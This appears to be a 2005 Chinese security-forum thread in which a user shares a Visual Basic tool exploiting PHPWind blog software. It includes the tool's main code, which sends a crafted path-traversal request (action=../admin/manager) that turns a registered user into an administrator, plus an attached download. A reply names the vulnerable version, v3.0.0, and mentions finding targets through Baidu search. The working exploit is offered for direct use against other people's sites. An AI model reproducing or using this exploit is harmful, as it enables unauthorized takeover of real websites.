‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[原创]VB写的phpwindblog漏洞利用工具

fhod

运维管理组

Rank: 7Rank: 7Rank: 7Rank: 7

E.S.T论坛版主

帖子
906 
精华
16 
积分
7085 
阅读权限
150 
性别
男 
在线时间
537 小时 
注册时间
2004-12-6 
最后登录
2008-12-29 
楼主 发表于 2005-9-28 18:46  只看该作者

[原创]VB写的phpwindblog漏洞利用工具

文章作者:fhod
信息来源:邪恶八进制信息安全团队

玄猫发布的一个漏洞利用工具..后来经过抓包分析..发现其实不用修改管理员密码..直接就可以把注册的用户提升为管理员...接着用VB写了个程序.方便使用.
具体利用程序里有使用说明.

程序主要代码为
复制内容到剪贴板
代码:
Private Sub Command1_Click()
WebBrowser1.Navigate (url.Text + "/user_index.php?action=../admin/manager&job=submit&username=" + user.Text + "&password=" + pass.Text + "&check_pwd=" + pass.Text)
WebBrowser1.Visible = True
End Sub

Private Sub Command2_Click()
End
End Sub

Private Sub shuoming_Click()
Form2.Show
End Sub
以下是程序运行后的截图:




PS:本人在EST的处女贴~~~

附件

phpwind.rar (10 KB)

2005-9-28 18:46, 下载次数: 377

TOP

高兴

晶莹剔透§烈日灼然

Rank: 1

帖子
59 
精华
0 
积分
72 
阅读权限
40 
性别
男 
在线时间
313 小时 
注册时间
2006-7-24 
最后登录
2008-7-12 
沙发 发表于 2006-8-30 09:55  只看该作者
引用:
这里是引用第[3 楼]starjason2006-08-29 23:16发表的:


针对什么版本啊?
百度
Powered by PHPWind v3.0.0 [s:35]

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题